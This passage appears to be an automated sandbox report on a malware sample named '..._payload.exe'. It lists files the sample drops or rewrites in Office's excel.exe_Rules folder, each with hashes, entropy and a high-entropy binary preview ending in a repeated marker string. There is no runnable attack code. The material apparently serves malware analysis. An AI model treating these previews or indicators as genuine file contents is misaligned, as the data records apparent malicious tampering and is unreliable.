                                                                                                      Preview:<?xmlp..q...._.v|.i.7..fY_.vJ=.....u.w.b...=...K./v.k..l-S.2..4+ ....K.(........s....;.%o5..0......n..J.U..h..f.l...*..(.:2..B.../.L3...D.!.U.c...h@-...pR.,./&..D.[.~...j7=...G.......^"...t..46...k1n.....pB.!.z..(......X.f...'..m..H7..4...)j....J.cd.a.``....^z1...]...z...b.....f6...R.t...I.B,...3..GT.n.T........?....l..g.16..H...7.{c..hXH.nF.nA..;p..r.<.vw.6..^...X..W.9.....+#.h#.....{rw.<..D.n..+a...7...4.>.~..........^0..@[...j....1c.\..].y.:..}..I"..y.d...K/.@.<L.?......>1.+.9l,....J2.....Jgz.[do.>..Mh...m.H...5B.1.|.......&..7`.%#K'....xS....T..e.^?..W....A..g..@0.F.LwGO...l.6...<I.$..H...A..f.y.o.k~...[...~..84.....3m........}.V..+.i*2....,Kq....J.:A<.^=.}..K.H..Xr.Q.P...~.T...QL....,&.. .u....lj..$%wQ......L....J0%..FgX..........W..dQ....BG.W...#u...R.{.&..d..6..T......%.*.k.q>v....L09.T...Nd.....>3..tI......$.<RZ.....'.<.l.f!."...3A.<.:.A5A..s.!...3p.\sn5K.:....o;.G..N{.C....*7..........(..i`O......2|.2...............;w/]YT.5.Ir

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68028v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):899
                                                                                                      Entropy (8bit):7.716577791288056
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Dd9dA6vcm7US+1R3ky5IpoSnCaalN2v6bD:B/Em7US+3kGIKSnpalN2wD
                                                                                                      MD5:5399F897B98F83425B95B9DB6200E92E
                                                                                                      SHA1:81668B828D0CB6B4F402C5A56E07FD05D50065BA
                                                                                                      SHA-256:758EDCA61B7A65BDFCE2B4012EA205E38982FC5F26DBEEB57A25CC1C760B9B20
                                                                                                      SHA-512:003A9D93C34AD8FCFB76E32E50A77D113E7926C61273F221AEE2EE40AC95D84A6559388641A05894542256FA39C8218B8F1C1E2C5E01ADED2774A2AA074DA882
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlb.8Hu.\}%[=5.}....,"....5~.`.ed.~.q4...T.8......5m..LW?b.C..0.R...*..@.-x......},.]*-p3..sb.z.......nm.JNb..h1..NhczZ.....Kv....."......7..BN...AM..cP....A.<$....y...R...H....l}....A2K.}k..h.|.....'PP..e.n.....R..Wd .`.C)...H.V.P3K.N.z.,k2.....^..J.PoP...<:W.~-..>. ....m."dt.,..._...3...D....{....9hi!. ot.T#.j...A.*1..>Y>..Y..;^...U.%mFa.x....s...n..!.w.....\...{..8..3..].....m......q.k.j.cn.&...f..J.5n......q..d1"....2.]... ...y.=\...yE..5.0...?)...$.RB...c..q.....v....%.Zi....X...k[.W0.-.R.!...\+P>.......Z.9.A.9.6y...f...u...l)....^.......I...-.,J...Z2.J[.>P}({.E...*z..WO..~.N.&.H...U..u...K....kuk......R.Cx..m..}<y....O.L..8.w9,...b-...0..k..=;i}..L.o.Gg..C..X..J..Jx..L.C...h..y..~;.|O.N..{...d>=8....6...5.T.4...X..|.#.w.QCr..6nXZ...Q...u....B...7^.(p.l.<....hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68029v2.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2224
                                                                                                      Entropy (8bit):7.926631792106482
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:bDgNZwuTo2kwZ5ZQJouxrTf30v+I33FfqfOJ4zkpL6kwD:Paw/seJZZ02MFqfOS6L69
                                                                                                      MD5:705844AC38E45DCB01FD018C6478FE6D
                                                                                                      SHA1:75663CAC5D17E3E7787FDC03004CF1686ACACFEB
                                                                                                      SHA-256:C6EF73C3D18A49C12B2E2155C46B79F0C3BFAA265BBDFDAAEDF22809401884A8
                                                                                                      SHA-512:E177179DE5F7CC1967C88493D9C575A36DACDEF8F6D33612871558FDE168E61F0E8B694207DA9F1439E135D5F584F5CA6CDB09E50279FE7F850989B54040D44B
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml\...:_..hLmliE.&d...j.h.$=.1..YeI..K.y.L....Y6..C^.... .(W{...J..'lWE.qyM..I.Zg..z?..>...6.e..nA...w:....$..Xe.N.Eq..:I..k.cn....<......I.{,.rTf.$\.+..=.. j...Qs.>)..0[.~..Rb....K]..Z.T.t...hz.....K...b..z..2HQM...X..(...s..q....%+.C....Qh..{..gk.wA.W..3..@...I.n..)..........l4....i....."...`......].>.L'.....5kul+.|.:....>...l..#...$.;...nD.x...u.z.=.<.,4..W..4..d.^..m....u'..........d...u...l..0..oHf..4R.NP.~9.G..U.G..}..X........?N.?....j.8..b..o..t.....Cb%*.....7......(bt..m.u..o.....L.j.{K..zs.O@I..F.)3....X}..{..>.....xq.\v/..47..pIW....T.......g5Z.)]...Z...DYDf....X...`g..x.s.1.....(.}*w.......M|.!n.~...5.P.W<.Vm*%._..Jy.%W..ya...#2~.x....jMN.G;F....$Hu.`J<.7.=.X.g...c.BK.....&....."T.3...,.8.m2.u...0.zs.S..p.......fW-.$....X.e."..Q.C..H....9.T.`....CMo...|H....Z.H.....o...B$.9..y.....CnWV.o.7.@5&....K].%Wz7.....N..E...U.I.t...[<eD.3....g`c\..I.|..[.*.m&L....}..c...M2..chw.z7*;.j55...W.H..0......1.....;4.(p..E..X_V.^0.c.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68030v6.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1560
                                                                                                      Entropy (8bit):7.877847096216673
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:dG6LWWgSI+xDIUQIIBFbLBZvqRpscFPho8DJW1fY41NzGSMYxExG4WzF8v6bD:dPLlgwpdwlHvqRmoFE6INzzMY5B8wD
                                                                                                      MD5:6E24DD9B5300E621CD0C22ED1C44A84F
                                                                                                      SHA1:71CBAC796A327CC47EF6E632F53A54510CA23605
                                                                                                      SHA-256:38F7E45F4AA50DAAAC7427A76494339654CB0F2738CD78378C11D04FE84C9DA4
                                                                                                      SHA-512:AAB830D368AE0860244E72A2868364B1ED3C6E49BCB0AB1482B54563509609DD9AF15D05ABCCF82624F4146ABB6A82CAF6C61E46CD8CA89925194609A1EEF5DA
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml....7........~U.[.....S.#.....rY`.i9`^...Y..^.>g..8;.\....4.J/.;.>.hZ.@.....,.HQw...I..!.......1..:....-.d.f.S.F". .s.?)$.cr.p..!H0Y..3.6...n.3..j.n..,pA..0..$..y.x..!(.#:c...p~.k..d....<...QB}L.c....L.k.....g.'....t...5..f,..Q. <......|...?P;....u~......?..o.D.........~P..oV...;...|...mkwm..w.R.4VT.........%50. fv.i(IB.a...Q..pv.....9.m.PK.?.[E..?_...b..S2?+.....=.f.s.-..I|x..."....(u..qZ.U.7D..Ap+..e....s.p..wY.@.'..8.....j..^.-3O..&.....Oq...TJAG..H..U.....S1R.bo..;2K W#..]Y.~...:wh 0.....`.w!.i~.#gr......}......M.........[2...e...!....^1ji^.....k....r.$m<...=....;...cK\..%B.-<.D...*.........x..CN$6.Cs..0.0.....(x1rb.=....F.Y......-&...=.>.Ev..^.\..XW>..H[.F..."bj.PG.Q..d.=..k....0...l........<.?+tk.....k..'bx.mh..<....W^..P...}.....04G..~..KS.{T.E.7O.MI.....e..,.P.....9.Iw...G.....B.....T...w.9.xA.B..z.;......y..q.......qd.+.....,..k{..."..t).c....--.w@.M..k...b.{...:#....P....s*.u$.....U.K....n.....:..3.+T....v.....bW(.}..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68031v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1206
                                                                                                      Entropy (8bit):7.821310414640128
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:0ZbSgroFFO3FZW/tj0g2+ZmwYAdhD43B9SUYLL+bQfmJWMcY/lv6bD:0lSNFOWj0g24YAw3BhYf+sfdBIwD
                                                                                                      MD5:7A3AA110AC2841499B75B9352A805DFB
                                                                                                      SHA1:75F1A126B67291F3FCBD73AA0053E2EC16E5F44A
                                                                                                      SHA-256:7783F048469DC1B2A43B8CFC55CCFAE796C6DB9E27BEE3F2E22A087FB0985FA4
                                                                                                      SHA-512:12C1F44F5CDB7CAAA0EB81F6B8A569F40386C4196BAF0D86E006ECCBC62304D877704ABB44EB7B3E3A3BAF1F67B9256B4260599B0EEF0BAC7C485448C5F789E0
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmld......~7.u:..4.....c.....aK..aI.rt...5W.'.9wQXIF...N..]..U...+.E....!..O..&,..Lv....B...t..5..K..G.(...! q#.`..jS......j1..HJ.6.....(ZC..`.ZM.`......)..uA.Ly..0<F....q...1p.X...K.?.5.`...>C....gx2.C.I..^....N_..WR..l\8.a...a*....VYw......K|_0...d... .t..H....,..^h.......3.......:.y.a...Hd.m.W|.IZo..u..D.G.....A..E...#.v.>.-)B...f..C.........w..h.Y.........iq...+?.G.U3!....Xe....M.N...I,..~^.,.......7..x~...".~ ..Gl..)(S$.q}..\..E-X...n..c..#j.Los(G t'...h+...+."BD..[...%......j.....V(7.(;U..3.......r$..!.......cc.K.*~.4....O..S..f.h.!bf...m....#..'.<.[H%2..+.l.4..p^...`.&+*3........2BS....p......x*..kk[...a..9<..fd.a..BL...R.&.+m...#m|.wau...Y.....Z...........&'.......1..c.pg.aV#L.^.".). C...H4]..h....{.@.."...vv".Z......^...1X.hp.5>....1"=...7..8..fH..rA.>.N....K0.|.u.F..e%kJ.."....FE.%......s..vx.o.uv8..;....kH.h.%.Y..{..Q..%H.Y.p.@.......ZE..t/...+.#...1.....1.K......g..9t.N>..e.7{~..oS).....s.7r.$...D.,ft........]!......^/x.Zw....thl.".

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68038v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):738
                                                                                                      Entropy (8bit):7.707267347882314
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:T/mb39dvtv5c6wP9xzvbLYdnZBRADlmwYe80sDtajf/9/pvfQdjj7aSqv6cii9a:j4rxIP9xzvbL8RCHYe80s0rL3Qdjjxqs
                                                                                                      MD5:29288C658BE96D253FCBDCA04CBB34DC
                                                                                                      SHA1:546AFF2C0F963B815BD277CEAFD066C571FCA1EE
                                                                                                      SHA-256:D891A830A9212656CA881D74B0995AD9D31CC9D7AA59810BFC108C5E2C9308FA
                                                                                                      SHA-512:8E4C0CA664C85F16FDB5C05F76F556F31EDAE6AF03225A5AAE7D2B85132BF678619AD25F7D16C40BDE1E5A4CEE2668F5D030D8756FE6AC289A70B9A7C0642522
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.....#.n.W.}..`...*C}......./..e./..~..V_A../.o..A:.[a.~.d]_..;)IZ.....!....E..AA........v+...@...0.B]...B.@..$...q.}..|H..'..!.p.j!.......3_..l..;.......?.@..>L...[ss...,....Q...r..N....u...;...!.-...S.k.....V0|.(.....?.A"\.qB~8s.<Hg...u......P.I.i....).n....N..||..........].I..C.L.....HN".r|.o.\.^..'p..T[..2Ok...........;..,.Q.n..%.(..."].WMRv..F*..S..L..<qF^.3..1..G?...-P....Q.r. .%".ig*IdV..u]2..x.B.e.._....Ww.........h.. .........'...7A!...Z.>i.H.a=...n-|.`...:..<U}uZ}T............(o..@...., oc.!.......v...!^..3FWw.DO...L........=...C.;.......j.!c.nU.U.8..o.n...V.:....~.s.7....Odq..N....E..1o7"3.j~I.u.l..hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68039v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1044
                                                                                                      Entropy (8bit):7.796348019301932
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:+1R0Nb9A69tJxfiA5A459tnZ1ppzpFYaO6ImkHFicCTOv6bD:qsN9tJxfvTTtnZ1ppzrYfiEFRCTOwD
                                                                                                      MD5:83D91CA3C2E389F5E3A23C85D3F0286A
                                                                                                      SHA1:763CDCE36DF31630DDEA3AFEAFE2AD11F9EBE905
                                                                                                      SHA-256:0D4CEF4B7457DDB0770FFCD3E6EC3F93F32DECD952294CCEBC9C8452CF4EED1F
                                                                                                      SHA-512:F115132C6BC47D336E7540C18A74D816799B4D81B83500126AE81C3A7DFC446854672C186DE9ABF514528334927E9532ACCF63F628D87CE1FEA5008A296452B9
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml#Z.F...U.2f.{...*k9$*.x.G?0...t..|.3.n"...Xw.k*\Pc..wZ...C.g.....~>'q<gw.....c..+.e..% ..c..%.......9.z...y...)v..i.'a....1f.zv>T]x.9i._..\'.7.5!V.........N...@...#..d.U.Q<8.~5F.]'..^.".a.].....:.V...c......... ..&.."......J.-...w..5..m.A.....p9..R..?.....}%S..../..*.....q....e..-:.......hal......f....$|,~..%e.-..?@W.....E.^n.z.....nh.....X...q..>N.-.....>.s...k..n..SNO^..9A+.JU.I...27......P......).i.k..p..a\.)i5.3.-...W..~..T..s..O.}.8...a.H.[........d.L....`..4..8.{.^.1r..R.$.\&j.8..V..o..S..o..8%.RtD..%..U4....6.'...iO2d..y..&Q....u.7+:u[Z............b}.'t5a......$...bEz8.....4.d.8P..N.....}.6.3.....rB>..X.Y.._.s=..`......@.y@R..Ba.../.{+4...B..5..G".{$..T9...5..q.xE.b.T..{..aZ.."..;@=!/.N.l+.....]E..&.J...j.2.jj..I....f....D.......%-....s...d.(....n..E........nW...W.....M.....8.&.oi...V......P7..Z3y...Lc5.m.._^`d.-.OU...aFN).X..<..<.[.&*.u& ..'[.O-.3U.<.a{...T..M.k.1....T...1.|.`.i&a_.(.8....d=hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWE

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68040v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):862
                                                                                                      Entropy (8bit):7.769358173264377
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:khJOwXOYEOxJORU6a0IsEhQiIypOgoGclyNNdov6bD:khJOwnx2Uts6+gNcsjdowD
                                                                                                      MD5:C83E1EB882E4CD5ED54C72D8BA625560
                                                                                                      SHA1:B6D3BC1F5C495B70A9B7BEDC0DAF99921315BDF9
                                                                                                      SHA-256:A1D9390DADE3309ABA77C52600B9D7C76FE36B7526A9D8188B7D5718DD0AD6FC
                                                                                                      SHA-512:288513951BC22EB9D229B2088AE9BDAE7CFEC22CF22719A57BA58A99B4F02254E9F584DF091EBDFFC7D55969A9F9A134E58C9A2F1C8D858A515BFDF377D809DC
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.X2U...tr..;J.|Y./.?f.....0.z.)..<n.|-...._.L.4.._Wq^.U..j.G.m.S...=>.... <.|Z.._,.w?i.Y.[../t|.....m.Z(.0..F......y..,..N.........c....._.q.[}.I.r.H.p..0k]..:.KE1.3..K8..'...)...y.a0.sR..ID.<{..cr[l:\...9^...-.8Mi.-..V...;.L..:.y*.3tz..6...A2H3`c6..w.p.6N....cV.Y...s.Y...d.*.....L.p.."...!......&}.l.P...(..=..I..=......jU...\E...'J.u.U....f....I.._..c.....J.P?.I...|..f.:......J...W.5.h..da..T.....Y.)d....sg...].....2..S.]..Z....:l.1.+I...L.....R.2au..z.1P,Y..^........{.M%u.cE....x5....$~K...8..i`1.U.*.........&.g_&...'.....+)...`.<.A.G..}.....Y...6...K........d......N%.D..p`g..3.K...K.Tg..Ue..kiV..K.G........j......r..=B...G...+.]..-....j.....B..Z..q@p.K.c.2......x..........3...w1..{.V0F?N....S.-3..B#.v... zH..Va.X>..u..........hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule69600v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1376
                                                                                                      Entropy (8bit):7.842914645404476
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:5fJyU4A/6s55F1NVVuGUo2Nxw1ICzWmxU+Ptpq6O2ZdY/SrsV1ObB0PTOv6bD:5f4fM6s5z1MVwXzWqU+PtIMZG/+sV1m0
                                                                                                      MD5:0E619C81FDB103E3E8FD4E67AC01C9B9
                                                                                                      SHA1:DE755D7CDE92B8A7F8F855ADBC865EC98F7EC6D4
                                                                                                      SHA-256:4C46E31663529E4927947BCA6A4F26484713080CBA895A742E31F36C10FB7ECB
                                                                                                      SHA-512:F3084F8E7FC4A37C651B6041DBFE6CE347D4C456908BFCF08360F9E65275BF574895E116B41F81342A594D416129668B7A1FB9E4E2B896B45823EFC399CA21FB
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.]cH.#%w:......(..H...3......3.....Z@..._$..;...u*q"....B;T3i?$..<m....X.Z...>.......w!.@.q.\Sr=D...N...V..GY........=.....3S&...!..,..e4.4|k....).=A......."b...6....?;.....@....qS,..j....I ..Fj-K.^/ .m.n..Q=?x|.......+B2]%..z.$.... ..!G..$...[rJq......N..p..9...KU....7....H^.H...gbJ+ ..rt.....N...*nc.2...A..$..".K......9.B..._.__..6N....1..t.$..K...:.m..IZ'..n......Vm...].0....u/]Qf...r...g(...a f.7.U .~.A.....:KmL.wv.L.Q2......=...qNq)r....>....TF.J.........%K...~.D....8.$........o.0..BX.=4d".......|>..5q.:............D8.q..s..Fy...Z.\.../pi\+<\9A3."!3n.Xy..\9{A..>S7.$...._.....a.d/zx.=.gS.[....d>%.....XF......I..]..3.RT......7@9sG....a....N._.r.J#1...E.jTI.BJ..B..20.fhZ2y-...+.......8.._9..C^D.g.mJ..G.$`........z..2M.P..^.<S<G.\^..k-.N...$...=.zM.\.:@l-/%...m...*59v^:....P....y...-.L.[c~.......[2'i..EZO......@..(...b....ML._.B..\....A.........'f.~....9g.Y....l.`..........j..f`g*...#..H$.........z..d>......]./...w.U.9....y59;

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700000v2.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2037
                                                                                                      Entropy (8bit):7.908366766832854
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:BSQ/9ZKT0j+B6F5bJZD0sBq98M4G0SE849yAI2p4+Mh+FezUAVjrwD:j8K+B67JZD0KqmBGe84Xq2k5g
                                                                                                      MD5:69934F48B72E8DF014D01C0B286CC086
                                                                                                      SHA1:606E52F0E932CE9B697CDEE104A286E9F8AE3D61
                                                                                                      SHA-256:6158515FD5AE9BF7061E04707A8BBFDBD43D8617E82DA6D7BB2ED5C54511C348
                                                                                                      SHA-512:1550C01435C8E5AC334F1D6D73A6E4E934BBEBBCA04F4745A19F5F11ED6FBB7D9BBF923F7276643565167B9AEFACA0712FBBD5996228865935BCC7A47AC49210
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.....M.......j...[.....R....v..K........>.8.... .Fj...;..@t*gQ..X...#..>...5.............6..Q.&E\i.....(.GR..FF....L.v.!.+..Z2....G>xx....j..P.Z..u.C.qCH..........W.8.W`[]....Sy. .~Y+..d...l\.m+....$'..V*u.n....i7.WUh.U.r.+.>|..ziD<..-.S..H.%q.vg....r{.......K...,......P......`}..K.|.{9$....}.yY....M...[WH.j..)xA/..q...^../..[T.z...T:^..A.i...;..C.g.>?>i...0!x.....,.....H...%H.[.2<.8..:...ZR...k)*.*...t-..V..M.g.......qI.H..OJ..le..9n.k.......ol.H...X..]..WBqDq^..%.)%.m.....x....ch.f)..i9...%.b..8].*.....d...(..U.v.uS.......\.w....-..*.^...t[f...W1..2.=.\H}.a. .....~...6.97.!R9~.H..D$wJQVV.....A....{.....?!.9l...m.#..*...,..*..Y..a@.......|.P..#.Btc.Qo...L...$..1I&N...x.e.d.GX.....M.h@.b.)e.iv.|.L.....Z./.%..B..-7...I..e...|qq.CHX.z.n..y.vG..I%b.5mF...u4.5...v.:...DQ..._(.*.#./B$.....c..Shc...=.K.do...x..\......'k.._D,...~..b.jk0..k,WH...|y.A.4.+.....z5..EB....M.....P..!.....wg%..*+......B[P5uVZ...F.W....G.....9`..%.E...EK.._.pz..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700001v2.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2074
                                                                                                      Entropy (8bit):7.892958855839475
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:FK5O3YMER1j/+NHWTudmktlfhSPoAre6CbEQwZ5qUVPZD7B8wD:FK5OIMEf/+UTudmkXZ8oA1CPwZkO7BF
                                                                                                      MD5:E84DDE3DF993AE8A91389F532CFBF764
                                                                                                      SHA1:8EBCAC982C559E4AD61AF4E7667F6C30EAB74D79
                                                                                                      SHA-256:78CB9B083876B9924DD3468F3D47D127564229F833B48A55B1D8C4A6C871F18A
                                                                                                      SHA-512:77B78B92EFF9ECC91EF8EF8E7308897E48C5A03290DC2E7A45EB963D7F73C122DAF8FB98F341DF8056D24BA0F7D77F6BBB3D34CD67CCAC77D7243F21C377F414
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml....]....SO.3...~l.....O.x.....E.....sR<..B...~..J.[..c..D[.q.X..Q..8h..|{.MF<D{+.:|..!.d0......w...|..9...C.......O.z......d.0..U.O.p...K."...~..o...qO...E..m..t...\..).I>U.`.F..&....f.M.y...c.<e.V.9j;<{....v|#...:...t.U.s....N.)rV.x.M9.+CLUNE.l_...=EP%DQ'....[..=.....J........h6|..^.|;K(c...%m..... ........C.8.1|%...T..tn.Q..2..;O.*.u.;{.x..r.)"...zl.u...!dk....u..2..=...$.SvW..8...^L.....X }.]v..X7.kN..:...~..t..M.k#...%.V.7...1.q;.I9.7...................]...n......b....R.Tbp.0..o.......Es.S.}...."....%b....0?...e6h:.9[W....+..k..*?j.....R.Ws..Xu.7.lBW...T.......Q/.f.|M.~..J..&U...6p..f.........5".....9..:|..*.....{......(..O..].c...Yy......._.3.;...t.?.z..{...R..r.bi.Q2m.k.!#..*....7E<1fHO.......T`xYm...+T&:....DF.?E.xVA.`.......;a.RN.N8....*M...m...U....b.......J..v..$.9.....P.nf..........%...KP.b.+.\..k..r!.E..rF..&3..`..DG..g.Q...W.y.u1.K.<Z.w]...-..m..)m........<oa.....=gG..6.+_...`M3...h.9.....).n.....d..zA...#.,C\+....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule70002v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):878
                                                                                                      Entropy (8bit):7.786815397866961
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:55R2N6Y5R2VU9dRwLKBPqEtpHQ4h63k1pi+hbzDzv6bD:3O6eRQUhwLKByEtp343k1pzz3wD
                                                                                                      MD5:2EEC4A1D237466C339CBD15A8E01164C
                                                                                                      SHA1:5AC36FC501AF24BC193A4449E0AA2D80D08EE90E
                                                                                                      SHA-256:E8020DAF6D6BD6EE32EC66CFA26572D40F917E6FA25DBF4D5150096F8E4A0677
                                                                                                      SHA-512:10BF073FA1882EC38D778BE1245CF7AFFB102A0B21A06C99432C829A66FC2FC79A444F4D9F1648ECD563448C4F3DDD2A2A772C5CCCDBBFED774006FDC3F8AB2D
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...DAgP.H+...7..-......|..-...nR.}..,U.!...,2.Wq_r.*..[*z.Z.T.}........!.[H..Z&.:*V.d......$.B...N.......c./....?GF..u.l.<..PF.2..7@.?7...C.r..kB>..-...h....b.Z'y..x..;O'.....9.A.13EuqBcSO....U.1.?.^..w.._....A.@..,.....x....X.....$X..=.a.F..M.......[QN..cA.....:{`.......b.. ~...P..j.NN.%.i.....q..o...b....F..9M.>q..0+..j}..p.Oi../X.I...Uv\.... G.....|..a.N.....?Z.#.....4.t....D.u.b.<......*....5w.4...b.j.C...SBR.;..gG.....iH...M."..g....j.6..^.!.....KV X...:'.B.b..v?....8....Yg\.z?.;...t.d.....-Oa.WYb.L.Hj..3...bq.<./...4O..P8.p$i)5K..+..;W....6........a..U.(....h.g.q..t........q....}.L........'].L.d.....z.....U.h.....P...."."/.Lj.n|.......'7_..".........'e.. T....4a..^n| w.?....*.......CLb..s......C...*..I...H.)g..-....y.v.....<..~..9...EG.$..g.T..d.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule70003v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):726
                                                                                                      Entropy (8bit):7.738011473373965
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:NwYoJ7X8yVmFCskmEPZlUbLbCiVUtPSYarBooJfCSsU6QpjbtJSrplCv6cii9a:NwYy7syVoklxCEtSOj2pn/SrplCv6bD
                                                                                                      MD5:6EEE678BAFDBCBE952A31AD3C2C53807
                                                                                                      SHA1:71523F6D0EB1ED10A135BF1831DD14F9919034C4
                                                                                                      SHA-256:2D0C67481D882879D740B97ACE10B9106B24515875F1629EC83BE46CB1971D98
                                                                                                      SHA-512:EB5A25538A2D59FD2B5F2703C1CB3E1CF870AD1801B96599F5A97EC3E4F6F151C9656810476A4D1BFAD42832CC759090DF9BA27302509362509A5FFC4A53374A
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.k.!BM.C...........~5Yl.._u....../...b....B...8..!J..^...s..)K....V...GN.[.nZ..S...cl..t..x.z.....8t.Jj.2*.f..p...eD.(.M....&....N.u..0.0........l.*..\.@..S.../..z.ss._;.@....../..!.f.Y.=y.2..F.ws..P1...+m.D.ea.@..%..X...CI.p...k'\ LFOF;j....!..gy..,..U..K..q..o.5.......1....o....I.....P.Q%..+ P....Rl.......,...%6.d.Q..+...X....J.n......Hw"rc....)0.v."..`.Lp...:`..0...p.rP.}.....#....U.@w...&..... 0&.G1.&..K....._V.n....2..../fE....F/.B....C~.....oIYD.......d(.X..."...r.k.!.G..eC$.....}Z..z..D.h....3.r..`..=r....l.^....K.....{&.K....).....b.5%..f.p.7".+`._......TK.(..&Y.HZ...D.T.a....i...O..........._=.U.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):321907
                                                                                                      Entropy (8bit):6.6275739041795285
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:DfQc2CYvV0Q33DkWcEBwM1XNnTkMabYAVndMpa:Dfott3DENMPnTkMa0qn6a
                                                                                                      MD5:8DDAE2492BA26CB46374307AA6B07FCE
